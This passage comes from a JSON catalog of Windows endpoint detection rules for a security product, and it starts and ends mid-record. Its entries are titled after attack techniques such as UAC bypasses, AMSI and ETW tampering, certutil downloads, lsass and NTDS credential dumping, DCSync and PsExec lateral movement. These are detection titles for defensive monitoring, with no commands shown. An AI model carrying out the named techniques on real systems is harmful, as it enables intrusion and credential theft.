false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-amsi-provider-loaded.yaml" }, { "id": "det-endpoint-065", "type": "detection", "name": "ETW Disabled Via Registry", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ETW Disabled Via Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.006" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-etw-tampering-via-registry.yaml" }, { "id": "det-endpoint-066", "type": "detection", "name": "Windows Event Log Service Stopped", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Event Log Service Stopped'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-eventlog-service-stopped.yaml" }, { "id": "det-endpoint-067", "type": "detection", "name": "Windows Application Event Log Cleared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Application Event Log Cleared'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1070.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-application-log-cleared.yaml" }, { "id": "det-endpoint-068", "type": "detection", "name": "Windows System Event Log Cleared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows System Event Log Cleared'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1070.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-system-log-cleared.yaml" }, { "id": "det-endpoint-069", "type": "detection", "name": "Sysmon Configuration Changed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Sysmon Configuration Changed'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-sysmon-config-changed.yaml" }, { "id": "det-endpoint-070", "type": "detection", "name": "UAC Bypass Via fodhelper.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'UAC Bypass Via fodhelper.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": "windows", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-uac-bypass-fodhelper.yaml" }, { "id": "det-endpoint-071", "type": "detection", "name": "UAC Bypass Via eventvwr.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'UAC Bypass Via eventvwr.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": "windows", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-uac-bypass-eventvwr.yaml" }, { "id": "det-endpoint-072", "type": "detection", "name": "UAC Bypass Via sdclt.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'UAC Bypass Via sdclt.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": "windows", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-uac-bypass-sdclt.yaml" }, { "id": "det-endpoint-073", "type": "detection", "name": "AlwaysInstallElevated Registry Enabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AlwaysInstallElevated Registry Enabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": "windows", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-always-install-elevated.yaml" }, { "id": "det-endpoint-074", "type": "detection", "name": "bcdedit Used To Disable Recovery", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'bcdedit Used To Disable Recovery'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-bcdedit-recovery-disabled.yaml" }, { "id": "det-endpoint-075", "type": "detection", "name": "vssadmin Used To Enumerate And Delete Shadow Copies", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'vssadmin Used To Enumerate And Delete Shadow Copies'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-vssadmin-list-shadows-then-delete.yaml" }, { "id": "det-endpoint-076", "type": "detection", "name": "PowerShell Invoke-Expression On Web Download", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PowerShell Invoke-Expression On Web Download'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.001" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-powershell-iex-from-web.yaml" }, { "id": "det-endpoint-077", "type": "detection", "name": "PowerShell Run With ExecutionPolicy Bypass", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PowerShell Run With ExecutionPolicy Bypass'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.001" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-powershell-bypass-flag.yaml" }, { "id": "det-endpoint-078", "type": "detection", "name": "PowerShell Command Line Contains AMSI Bypass String", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PowerShell Command Line Contains AMSI Bypass String'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001", "T1059.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-powershell-amsi-bypass-string.yaml" }, { "id": "det-endpoint-079", "type": "detection", "name": "mshta.exe Executed Inline Script", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'mshta.exe Executed Inline Script'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.005" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-mshta-running-script.yaml" }, { "id": "det-endpoint-080", "type": "detection", "name": "rundll32.exe Loaded DLL From Temp Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rundll32.exe Loaded DLL From Temp Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.011" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-rundll32-from-temp.yaml" }, { "id": "det-endpoint-081", "type": "detection", "name": "rundll32.exe Started Without Arguments", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rundll32.exe Started Without Arguments'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218.011" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-rundll32-no-args.yaml" }, { "id": "det-endpoint-082", "type": "detection", "name": "regsvr32.exe Used With scrobj.dll (Squiblydoo)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'regsvr32.exe Used With scrobj.dll (Squiblydoo)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.010" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-regsvr32-scrobj.yaml" }, { "id": "det-endpoint-083", "type": "detection", "name": "wmic process call create Used For Remote Execution", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'wmic process call create Used For Remote Execution'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-wmic-process-call-create-remote.yaml" }, { "id": "det-endpoint-084", "type": "detection", "name": "cscript.exe Executing Script From Temp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'cscript.exe Executing Script From Temp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059.005" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-cscript-from-temp.yaml" }, { "id": "det-endpoint-085", "type": "detection", "name": "bitsadmin.exe Downloading File", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'bitsadmin.exe Downloading File'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1197" ], "log_source": "windows", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-bitsadmin-download.yaml" }, { "id": "det-endpoint-086", "type": "detection", "name": "certutil.exe Used To Decode Encoded File", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'certutil.exe Used To Decode Encoded File'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1140" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-certutil-decode.yaml" }, { "id": "det-endpoint-087", "type": "detection", "name": "certutil.exe Used To Download Remote File", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'certutil.exe Used To Download Remote File'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": "windows", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-certutil-download-url.yaml" }, { "id": "det-endpoint-088", "type": "detection", "name": "cmstp.exe Loaded INF From Suspicious Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'cmstp.exe Loaded INF From Suspicious Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.003" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-cmstp-load-untrusted-inf.yaml" }, { "id": "det-endpoint-089", "type": "detection", "name": "InstallUtil.exe Run From Temp Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'InstallUtil.exe Run From Temp Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.004" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-installutil-from-temp.yaml" }, { "id": "det-endpoint-090", "type": "detection", "name": "MSBuild Running Inline Task XML From User Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'MSBuild Running Inline Task XML From User Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1127.001" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-msbuild-running-inline-task.yaml" }, { "id": "det-endpoint-091", "type": "detection", "name": "ProcDump Used Against lsass.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ProcDump Used Against lsass.exe'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-procdump-lsass.yaml" }, { "id": "det-endpoint-092", "type": "detection", "name": "comsvcs.dll MiniDump Of lsass", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'comsvcs.dll MiniDump Of lsass'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-comsvcs-minidump.yaml" }, { "id": "det-endpoint-093", "type": "detection", "name": "Mimikatz Marker String In Process Command Line", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Mimikatz Marker String In Process Command Line'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-mimikatz-strings-on-cli.yaml" }, { "id": "det-endpoint-094", "type": "detection", "name": "ntdsutil.exe Used To Extract NTDS", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ntdsutil.exe Used To Extract NTDS'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-ntds-extract-ntdsutil.yaml" }, { "id": "det-endpoint-095", "type": "detection", "name": "VSS Shadow Created Then NTDS.dit Copied", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'VSS Shadow Created Then NTDS.dit Copied'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-vss-shadow-then-copy-ntds.yaml" }, { "id": "det-endpoint-096", "type": "detection", "name": "Impacket secretsdump.py Pattern Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Impacket secretsdump.py Pattern Detected'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-secretsdump-impacket.yaml" }, { "id": "det-endpoint-097", "type": "detection", "name": "reg save Used Against SAM/SECURITY/SYSTEM", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'reg save Used Against SAM/SECURITY/SYSTEM'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.002" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-reg-save-sam.yaml" }, { "id": "det-endpoint-098", "type": "detection", "name": "vaultcmd.exe Listed All Stored Credentials", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'vaultcmd.exe Listed All Stored Credentials'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.004" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-credential-manager-vault-dump.yaml" }, { "id": "det-endpoint-099", "type": "detection", "name": "DPAPI Master Key File Read From Roaming Dir", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DPAPI Master Key File Read From Roaming Dir'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-dpapi-masterkey-access.yaml" }, { "id": "det-endpoint-100", "type": "detection", "name": "Chromium Login Data SQLite File Read", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Chromium Login Data SQLite File Read'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-browser-credential-file-read.yaml" }, { "id": "det-endpoint-101", "type": "detection", "name": "DCSync Replication Right Used By Non-DC Account", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DCSync Replication Right Used By Non-DC Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.006" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-dcsync-via-replication.yaml" }, { "id": "det-endpoint-102", "type": "detection", "name": "Kerberos AS-REP Roasting Pattern", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Kerberos AS-REP Roasting Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1558.004" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-kerberos-asrep-roast.yaml" }, { "id": "det-endpoint-103", "type": "detection", "name": "net localgroup administrators Enumerated", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'net localgroup administrators Enumerated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1087.001" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-net-localgroup-administrators.yaml" }, { "id": "det-endpoint-104", "type": "detection", "name": "net group \"Domain Admins\" Enumerated", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'net group \"Domain Admins\" Enumerated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-net-group-domain-admins.yaml" }, { "id": "det-endpoint-105", "type": "detection", "name": "nltest /domain_trusts Enumerated", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'nltest /domain_trusts Enumerated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1482" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-nltest-domain-trusts.yaml" }, { "id": "det-endpoint-106", "type": "detection", "name": "AdFind.exe Enumeration Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AdFind.exe Enumeration Detected'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-adfind-enumeration.yaml" }, { "id": "det-endpoint-107", "type": "detection", "name": "SharpHound Collection Run Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SharpHound Collection Run Detected'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-bloodhound-sharphound.yaml" }, { "id": "det-endpoint-108", "type": "detection", "name": "arp -a Enumeration By Workstation", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'arp -a Enumeration By Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-arp-cache-enum.yaml" }, { "id": "det-endpoint-109", "type": "detection", "name": "route print Run From Workstation", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'route print Run From Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-route-print.yaml" }, { "id": "det-endpoint-110", "type": "detection", "name": "net view Used To Enumerate File Shares", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'net view Used To Enumerate File Shares'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1135" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-net-share-enum.yaml" }, { "id": "det-endpoint-111", "type": "detection", "name": "PsExec.exe Service Created On Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PsExec.exe Service Created On Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.002" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-psexec-execution-host.yaml" }, { "id": "det-endpoint-112", "type": "detection", "name": "PSEXESVC Service Created (Remote PsExec)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PSEXESVC Service Created (Remote PsExec)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.002" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-psexesvc-service-create.yaml" }, { "id": "det-endpoint-113", "type": "detection", "name": "PAExec Service Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PAExec Service Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.002" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-paexec-service-create.yaml" }, { "id": "det-endpoint-114", "type": "detection", "name": "WinRM Shell From Workstation To DC", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'WinRM Shell From Workstation To DC'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.006" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-winrm-shell-from-workstation.yaml" }, { "id": "det-endpoint-115", "type": "detection", "name": "Process Hollowing Marker (CreateProcess Suspended + Unmapped)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Process Hollowing Marker (CreateProcess Suspended + Unmapped)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1055.012" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-process-hollowing-marker.yaml" }, { "id": "det-endpoint-116", "type": "detection", "name": "CreateRemoteThread Targeting lsass.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'CreateRemoteThread Targeting lsass.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1055.001" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-create-remote-thread-lsass.yaml" }, { "id": "det-endpoint-117", "type": "detection", "name": "Suspicious CreateRemoteThread Into explorer.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Suspicious CreateRemoteThread Into explorer.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1055" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-suspicious-thread-into-explorer.yaml" }, { "id": "det-endpoint-118", "type": "detection", "name": "cipher.exe /w Used (Secure Delete)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'cipher.exe /w Used (Secure Delete)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1485" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-cipher-w-secure-delete.yaml" }, { "id": "det-endpoint-119", "type": "detection", "name": "format Command Used Against Drive", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'format Command Used Against Drive'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1485" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-format-com-quick.yaml" }, { "id": "det-endpoint-120", "type": "detection", "name": "icacls Used To Deny Access On System Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'icacls Used To Deny Access On System Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": 